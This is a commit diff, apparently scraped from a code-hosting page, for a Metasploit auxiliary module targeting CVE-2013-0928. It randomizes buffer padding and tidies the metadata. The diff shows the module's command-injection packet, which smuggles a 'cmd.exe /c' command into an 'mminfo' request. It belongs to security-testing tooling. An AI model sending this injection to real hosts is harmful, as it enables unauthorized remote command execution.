Randomize padding on aux module, fix spacing on exploits
parent
7e2d474a26
commit
4a479d17a9
|
@ -15,11 +15,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
injection.
|
injection.
|
||||||
},
|
},
|
||||||
'Author' => [
|
'Author' => [
|
||||||
'Preston Thornburg', # prestonthornburg@gmail.com
|
'Preston Thornburn', # prestonthornburg@gmail.com
|
||||||
'Mohsan Farid', # faridms@gmail.com
|
'Mohsan Farid', # faridms@gmail.com
|
||||||
'Brent Morris' # inkrypto@gmail.com
|
'Brent Morris' # inkrypto@gmail.com
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
|
'Version' => '$Revision: $',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
[ 'CVE', '2013-0928' ],
|
[ 'CVE', '2013-0928' ],
|
||||||
|
@ -36,8 +37,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
def run
|
def run
|
||||||
connect
|
connect
|
||||||
|
|
||||||
padding = "\x41" * 512
|
padding = Rex::Text.rand_text_alpha_upper(512)
|
||||||
|
|
||||||
packet = "\x75~ mminfo &cmd.exe /c #{datastore['CMD']} #{padding}"
|
packet = "\x75~ mminfo &cmd.exe /c #{datastore['CMD']} #{padding}"
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue